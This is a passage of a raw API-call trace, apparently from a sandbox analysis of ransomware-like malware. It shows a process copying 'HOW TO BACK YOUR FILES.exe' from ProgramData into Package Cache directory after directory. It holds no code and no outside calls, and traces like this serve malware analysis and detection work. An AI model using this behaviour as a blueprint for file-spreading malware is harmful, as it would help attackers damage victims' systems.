Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1e5280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.052] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.052] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.052] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0090.052] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0090.052] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.052] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.053] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.053] GetLastError () returned 0x0 [0090.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.053] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.053] CloseHandle (hObject=0x120) returned 1 [0090.054] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.054] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x5fac3e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fac3e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.054] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.054] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.054] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0090.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017" [0090.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.055] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.055] GetLastError () returned 0x0 [0090.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.055] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.055] CloseHandle (hObject=0x120) returned 1 [0090.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.055] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.055] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.055] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.056] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0090.056] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0090.056] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.056] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.056] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.057] GetLastError () returned 0x0 [0090.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.057] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.057] CloseHandle (hObject=0x120) returned 1 [0090.057] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.057] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.057] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.057] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.057] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0090.057] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0090.057] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.057] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.058] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.058] GetLastError () returned 0x0 [0090.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.058] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.058] CloseHandle (hObject=0x120) returned 1 [0090.059] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.059] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x605ec540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x605ec540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.059] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.059] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.059] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0090.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017" [0090.059] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.059] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.060] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.060] GetLastError () returned 0x0 [0090.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.060] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.060] CloseHandle (hObject=0x120) returned 1 [0090.060] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.060] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.060] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.060] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.061] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0090.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages" [0090.061] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.061] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.061] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.061] GetLastError () returned 0x0 [0090.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.062] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.062] CloseHandle (hObject=0x120) returned 1 [0090.062] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.062] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.062] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.062] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.062] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0090.062] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0090.062] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.062] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.063] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.063] GetLastError () returned 0x0 [0090.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.063] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.063] CloseHandle (hObject=0x120) returned 1 [0090.063] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.063] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x622a2ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x622a2ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.064] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.064] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.064] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0090.064] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}" [0090.064] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.064] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.065] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.065] GetLastError () returned 0x0 [0090.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.065] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.065] CloseHandle (hObject=0x120) returned 1 [0090.065] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.065] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x6260ee40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6260ee40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.065] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.065] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.065] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package 